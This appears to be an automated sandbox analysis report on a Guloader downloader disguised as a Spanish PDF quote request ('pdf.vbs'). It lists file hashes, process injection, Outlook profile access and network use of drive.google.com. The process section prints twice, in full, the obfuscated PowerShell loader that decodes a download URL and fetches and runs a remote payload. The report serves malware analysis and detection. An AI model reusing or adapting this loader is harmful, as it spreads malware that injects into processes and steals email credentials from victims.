Analysis
max time kernel: 141s
max time network: 139s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted: 25/03/2024, 16:26
Static task: static1
Behavioral task: behavioral1
  Sample: Solicitud de presupuesto Urgente 554PE·pdf.vbs
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: Solicitud de presupuesto Urgente 554PE·pdf.vbs
  Resource: win10v2004-20240226-en
General
Target: Solicitud de presupuesto Urgente 554PE·pdf.vbs
Size: 179KB
MD5: c310f16989ab3da1c9701c1cf8d31ecd
SHA1: b2aca8e415cfca454a889b1ad089f67c679b3df8
SHA256: 959ec9d9287432e3234cf35de1ad899ad4ae44d06e2bbf4fd0fe806b58ee6e21
SHA512: a409e379997ab922669672f959065db1ea82363a370274c2156dcbb4bca59b0fcca7ad3a7b6dea7ece3e2d0590256dac00c525f467ac00a6fe1bbc1e8302990f
SSDEEP: 3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyZ:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcV2
Malware Config
Signatures
Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.
Blocklisted process makes network request (1 IoCs)
flow  pid   Process
3     1764  WScript.exe

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook  wab.exe
Key opened  \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  wab.exe
Key opened  \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook  wab.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
flow  ioc
6     drive.google.com
7     drive.google.com
12    drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
pid   Process
3056  wab.exe
3056  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid   Process
2752  powershell.exe
3056  wab.exe

Suspicious use of SetThreadContext (1 IoCs)
description                          pid   Process         procid_target
PID 2752 set thread context of 3056  2752  powershell.exe  34

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid   Process
2308  powershell.exe
2752  powershell.exe
2752  powershell.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
pid   Process
2752  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2308  powershell.exe
Token: SeDebugPrivilege  2752  powershell.exe
Token: SeDebugPrivilege  3056  wab.exe

Suspicious use of WriteProcessMemory (20 IoCs)
description                       pid   Process         procid_target
PID 1764 wrote to memory of 2308  1764  WScript.exe     28
PID 1764 wrote to memory of 2308  1764  WScript.exe     28
PID 1764 wrote to memory of 2308  1764  WScript.exe     28
PID 2308 wrote to memory of 1464  2308  powershell.exe  30
PID 2308 wrote to memory of 1464  2308  powershell.exe  30
PID 2308 wrote to memory of 1464  2308  powershell.exe  30
PID 2308 wrote to memory of 2752  2308  powershell.exe  32
PID 2308 wrote to memory of 2752  2308  powershell.exe  32
PID 2308 wrote to memory of 2752  2308  powershell.exe  32
PID 2308 wrote to memory of 2752  2308  powershell.exe  32
PID 2752 wrote to memory of 1936  2752  powershell.exe  33
PID 2752 wrote to memory of 1936  2752  powershell.exe  33
PID 2752 wrote to memory of 1936  2752  powershell.exe  33
PID 2752 wrote to memory of 1936  2752  powershell.exe  33
PID 2752 wrote to memory of 3056  2752  powershell.exe  34
PID 2752 wrote to memory of 3056  2752  powershell.exe  34
PID 2752 wrote to memory of 3056  2752  powershell.exe  34
PID 2752 wrote to memory of 3056  2752  powershell.exe  34
PID 2752 wrote to memory of 3056  2752  powershell.exe  34
PID 2752 wrote to memory of 3056  2752  powershell.exe  34

outlook_office_path (1 IoCs)
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook  wab.exe

outlook_win_path (1 IoCs)
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  wab.exe
Processes

C:\Windows\System32\WScript.exe (level 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID: 1764
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee 
Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. 
Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. 
Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2308
C:\Windows\system32\cmd.exe (level 3)
  Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
  PID: 1464
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee 
Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. 
Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. 
Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"3⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2752
C:\Windows\SysWOW64\cmd.exe (level 4)
  Command line: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
  PID: 1936

C:\Program Files (x86)\windows mail\wab.exe (level 4)
  Command line: "C:\Program Files (x86)\windows mail\wab.exe"
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID: 3056
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: 0e42bc5bdbf9ab895bb027528edc4139
SHA1: f59fcec40aaff2f623d5588c1d448982556cc0ee
SHA256: 81c5a394565213f61de809e0dd1fd0972bfe0c36dc4c446ea986726bbf8e1fb1
SHA512: 71876b71b0bdfba832046c8f1f1ba43f3a35f951096d5d3e972f86e3696801ee3e23c1c86905f63aaedfc6309efd6c09693e0e65cfaae0102ad5439efacf980a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: 17377c3f45ec353713f1d897171100af
SHA1: f30b5fd3577754f5ce25d28982fee6283fb9e0c1
SHA256: 588353a715417a08f3eab42ee1a94afdeda0173661584c726e0347aaf82c5a73
SHA512: 6ba88b1f1168df5674e0226555ca5c9d645412602d18450d747778156016e6fb7043a09fb38e12cb2d820d662ca9cf1a50c3409f39b16d57eb775ccc7dc1825c

Filesize: 67KB
MD5: 753df6889fd7410a2e9fe333da83a429
SHA1: 3c425f16e8267186061dd48ac1c77c122962456e
SHA256: b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512: 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Filesize: 175KB
MD5: dd73cead4b93366cf3465c8cd32e2796
SHA1: 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256: a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512: ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Filesize: 6KB
MD5: cf56f5795de669e0ee0796627c7142f2
SHA1: 89a71383fe582e3ec82a024fd424cef08943daf9
SHA256: 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf
SHA512: c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
Filesize: 46B
MD5: d898504a722bff1524134c6ab6a5eaa5
SHA1: e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256: 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512: 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
Filesize: 46B
MD5: c07225d4e7d01d31042965f048728a0a
SHA1: 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256: 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512: 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\13W2C00ZFSWHOREFU16J.temp
Filesize: 7KB
MD5: b9db5309c55375cba4808735274121b5
SHA1: 4086e67f71b96aa911e1271e985ec19984843e25
SHA256: 135d3db0c26fdaab48ef70fd73fe5728508d705267ee1b92305641a7dfb5c986
SHA512: a4551402534ed0dfdbe018a5d3a8cc16732243147e408205ede6c3452480f006ed0407517a0cb666a6d673cccbd91fe7b30bc5b5ddb548941c9dcfc26aae655e